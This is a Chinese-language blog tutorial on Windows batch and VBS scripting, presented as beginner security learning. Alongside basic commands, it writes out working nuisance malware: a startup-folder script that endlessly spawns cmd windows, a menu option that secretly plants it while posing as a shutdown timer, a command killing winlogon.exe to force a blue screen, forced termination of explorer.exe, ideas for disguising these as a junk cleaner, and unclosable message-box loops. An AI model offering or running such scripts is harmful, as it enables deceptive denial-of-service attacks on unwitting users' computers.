目录
5.如何修改上面那个程序,让其中的一个选项带有恶意脚本(节选)
1.如何制作一个死循环(简单)
:d
start
goto d- 这里单写一个start是打开cmd窗口,start后面写地址就是打开其他的东西了。
- :d 注意:一定是要用英文的,中文没有作用
goto 区块名 #程序跳该区块
例如:goto menu #程序跳至“menu区块”,中间被跳过的区块就作废了
2.如何在启动项中打开这个程序
启动项:就是开机的时候系统会在前台或者后台运行的程序。当操作系统完成登录过程,进程表中出现了很多的进程。操作系统在启动的时候,自动加载了很多程序。
- copy 原地址 目的地址 复制粘贴
copy qq.bat C:\Documents and Settings\用户名\「开始」菜单\程序\启动
:d
start
goto d升级版:因为如果放到别的电脑,用户名不同也无法运行。并且像xp都没有管理员登录,那不就没有用了。
copy qq.bat “%userprofile%\「开始」菜单\程序\启动”
:d
start
goto d- 像带有特殊符号(「开始」)的,要在前后加一个 " " 。
- userprofile是变量 (userprofile代表的是你的系统登录名,你的系统登录名是什么,他就是什么)——这样保证了哪怕在不同的用户名下也能在开始菜单的启动项里运行。
- 两边加%,代表取值。
3.写一个小程序(变量)
@echo off
color 0a
title 哈哈小程序v1.0
echo ==========================
echo 菜单
echo 1、修改管理员密码
echo 2、定时关机
echo 3、取消定时
echo 4、退出程序
echo ===========================
:1
set /p u=请输入用户名:
set /p p=请输入新密码:
net user %u% %p% >nul
:2
set /p a=请输入时间(单位/秒):
shutdown -s -f -t %a%
:3
shutdown -a
:4
exit
pauseset /p u= ( 字符串 ) #获取输入的字符,将其赋值给变量u
%u% #提取变量u的值
- set /p u=请输入用户名: 红字部分是给别人看的(因为你加了/p(/p是选项的意思),如果没加的确是u=请输入用户名)
net user 用户名 密码 #修改账户密码(windows所有平台支持)
>nul #清除一条命令执行后系统反馈
shutdown -s -f -t 100 定时强制关机
shutdown -r -t 秒 定时重启
shutdown -a 取消定时
shutdown -l 注销,同logoff命令相同
shutdown -s -f -t 100 -c "haah"(把你想要说的话放到双引号里,后面它会在提示的那个消息里呈现)
但这个代码有个问题,我就想修改管理员代码,但执行完1,后面的2,3也会跟着执行。
4.上面那个小程序功能完善(加上if,goto)
@echo off
color 0a
title 哈哈小程序v1.0
:menu
cls
echo ==========================
echo 菜单
echo 1、修改管理员密码
echo 2、定时关机
echo 3、取消定时
echo 4、退出程序
echo ===========================
set /p num=您的选择是:
if "%num%"=="1" goto 1
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3
echo 再见,我亲爱的朋友
pause
goto menu
:1
set /p u=请输入用户名:
set /p p=请输入新密码:
net user %u% %p% >nul
echo 您的密码已经设置成功!
pause
goto menu
:2
set /p a=请输入时间(单位/秒):
shutdown -s -f -t %a%
set /p x=是否取消(1:是,0:否):
if "%x%"=="1" shutdown -a
pause
goto menu
:3
shutdown -a
pause
goto menu
:4
exit
pause- 在合适的地方使用cls,能让界面更整洁。
- echo 再见,我亲爱的朋友
pause
goto menu 这个也很重要,如果没加,我假如没选1~4的数字,if不成立,它会像原来一样按顺序进行。
加了,我选择1~4以外数字,会跳出“再见,我亲爱的朋友”这句话。
5.如何修改上面那个程序,让其中的一个选项带有恶意脚本(节选)
:2
echo :a >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
echo start >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
echo goto a >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
- 这个的作用就是在启动项下创建一个循环开启cmd窗口的小病毒
1.> 清空原来语句,并将前面语句放入(覆盖)
>> 将前面语句输入到文件的最后一行,不对原文做修改(追加)
6.后面可以尝试的几种思路
- 伪装垃圾清理程序添加一个开机自启动项,无限弹出CMD窗口
- 伪装垃圾清理程序强制终止桌面进程
- 可以让开机出现蓝屏,无限弹出cmd窗口,定时关机等问题。
7.最简单的蓝屏炸弹文件(针对xp或2003的蓝屏命令)
ntsd -c q -pn winlogon.exentsd #杀死进程
ntsd -c q -pn 进程名 #强制杀死进程
蓝屏原因:winlogon 进程不能被杀死,我想强制杀死,系统不让,结果导致蓝屏!
对win2003有很大的杀伤力,但对win2008基本没有杀伤力(……对win7win10已经不起作用了,还是需要组合一下才能再次起作用)
winlogon.exe——是Windows NT 用户登陆程序,用于管理用户登录和退出(我们正在使用它)
8.强制杀死一个桌面
taskkill /im explorer.exe /f- /f ——强制,taskkill——杀死进程,/im——进程名
我习惯是先杀死进程,再写上要延时的设置
9.还有一些指令,一些小玩意和对批处理的介绍
1.@echo off 关闭回显——屏蔽执行过程
2. pause:暂停,使用这条命令后面的命令暂时不能执行。得等我们给下一个命令才会继续。(会有一个请按任意键继续)
3. echo . 是空一行的意思
4. >nul 是屏蔽操作成功显示的信息,但是出错还是会显示(即1>nul)。
2>nul 是屏蔽操作失败显示的信息,如果成功依旧显示。
>nul 2>nul 就是正确的错误的一起屏蔽掉,就啥也不显示了。在最后面加1>nul 2>nul这样不管文件是否删除成功都不会显示任何消息。
5.分区块
:menu "menu"区块
:1 “1”区块
:2 “2”区块
这不是一个命令,但它会被识别,它会知道我要进入哪一个区块了。
6.批处理作用
自上而下成批处理每一条DOS命令,直到执行到最后一条!
7.如何创建批处理
扩展名:.bat
创建方法:新建一个记事本文件,然后将其扩展改为.bat
8.修改关联性assoc(把很多扩展名的关联性给改了,最后无法执行批处理)
双击执行批处理的一瞬间,批处理会偷偷帮我们打开一个cmd窗口,然后执行一条条命令
DOS窗口也是一个程序(cmd.exe),把exe改成txt。
9.做一个延迟:ping -n 10 127.0.0.1 >null 2>null(反正也没想它ping通,只是单纯想做一个延迟,如果你想拖更久时间,可以随便乱写一个——很多东西要自己去思考,才会能把你学到的东西活学活用,这就是目前看到学网安的乐趣)
10.扩展:
1.一个简单的脚本
msgbox "我最帅!"测试效果:
方法:把txt改成vbs(脚本语言)。
2.一个简单的死循环脚本
do
msgbox "我最帅!"
loop测试效果:
效果:窗口无法关闭
解决方法:
vbs 使用微软自带的wscript.exe来编写的
升级版:(极其有趣,无法按叉号关闭,只能循环一直按下去)
do
msgbox "飞哥最帅!"
msgbox "小子,你对这件事有异议吗"
msgbox "你要为此付出代价"
msgbox "从现在开始我要求你点100下鼠标"
msgbox "100"
msgbox "99"
msgbox "98"
msgbox "97"
msgbox "96"
msgbox "95"
msgbox "94"
msgbox "93"
msgbox "92"
msgbox "91"
msgbox "90"
msgbox "...."
msgbox "3"
msgbox "2"
msgbox "1"
msgbox "如果你看到这里,说明你确实很执着,你感动了我,请再点一下"
msgbox "年轻人,有时候执着也没用,换个姿势再来一次"
loop如何打开任务管理器?
- 快捷键:Ctrl+Shift+Esc
- 快捷键:Ctrl+Alt+Delete
- 右键任务栏
……
扫一扫
673
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
